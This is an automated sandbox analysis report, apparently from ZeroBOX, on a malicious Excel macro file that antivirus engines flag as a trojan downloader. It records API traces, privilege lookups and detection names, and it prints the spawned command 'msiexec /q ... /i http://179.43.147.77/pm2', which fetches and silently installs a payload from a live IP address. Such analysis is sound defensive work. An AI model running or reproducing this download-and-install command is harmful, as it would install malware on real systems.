popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

20.06.2019_430.22.xls

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 3, 2021, 10:49 a.m. April 3, 2021, 10:51 a.m.
Size 182.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Microsoft Office, Last Saved By: alex, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jun 19 17:19:06 2019, Last Saved Time/Date: Wed Jun 19 17:42:11 2019, Security: 0
MD5 abc46888f8cfba2ee7d895971723b23b
SHA256 f21039af47e7660bf8ef002dfcdb0c0f779210482ee1778ab7e7f51e8233e35c
CRC32 CD1D98C0
ssdeep 3072:y8ihKpb8rGYrMPelwhKmFV5xtezEsgrdgOLwQdh4Mj2IxKC+l1e1qn8/P7y4eygT:y8ihKpb8rGYrMPelwhKmFV5xtuEsgrdJ
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]
  • Microsoft_Office_Document_Zero - Microsoft Office Document Signature Zero

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
179.43.147.77 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Statement CallByName App1, "Show", VbMethod
suspicious_features Connection to IP address suspicious_request GET http://179.43.147.77/pm2
request GET http://179.43.147.77/pm2
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dce1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dd3f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dc81000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6d801000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07530000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07540000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07550000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f571000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e74000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6f492000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6db11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6db01000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2256
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6dae1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0
host 179.43.147.77
parent_process excel.exe martian_process msiexec /q step1=commonl step2=files /i http://179.43.147.77/pm2
DrWeb Exploit.Siggen.23566
MicroWorld-eScan VB:Trojan.Downloader.JURI
FireEye VB:Trojan.Downloader.JURI
CAT-QuickHeal X97M.Downloader.36914
ALYac Trojan.Downloader.X97M.Gen
Sangfor Trojan.Generic-VBS.Save.83dd94a5
Cyren X97M/Agent
Symantec Trojan.Mdropper
ESET-NOD32 VBA/TrojanDownloader.Agent.OJG
TrendMicro-HouseCall Trojan.X97M.FLAWEDAMMYY.D
Avast SNH:Script [Dropper]
ClamAV Doc.Dropper.Agent-6997344-0
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.Downloader.JURI
NANO-Antivirus Trojan.Script.Agent.fsjxln
ViRobot XLS.S.Agent.186880
Tencent OLE.Win32.Macro.704436
Ad-Aware VB:Trojan.Downloader.JURI
TACHYON Suspicious/X97M.Obfus.Gen.6
Sophos Troj/DocDl-UKO
TrendMicro Trojan.X97M.FLAWEDAMMYY.D
McAfee-GW-Edition BehavesLike.OLE2.Downloader.cb
Emsisoft VB:Trojan.Downloader.JURI (B)
Ikarus Trojan-Downloader.VBA.Agent
Avira X97M/Agent.4765030
Microsoft TrojanDownloader:O97M/Donoff
AegisLab Trojan.MSOffice.Alien.4!c
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
GData VB:Trojan.Downloader.JURI
Cynet Malicious (score: 85)
AhnLab-V3 MSOffice/Xprocess
McAfee RDN/Generic Downloader.x
MAX malware (ai score=100)
Rising Downloader.Msiexec/VBA!1.B93D (CLASSIC)
SentinelOne Static AI - Suspicious OLE
Fortinet VBA/Agent.UII!tr
AVG SNH:Script [Dropper]
Qihoo-360 Office/TrojanDownloader.Generic.HtoASOUA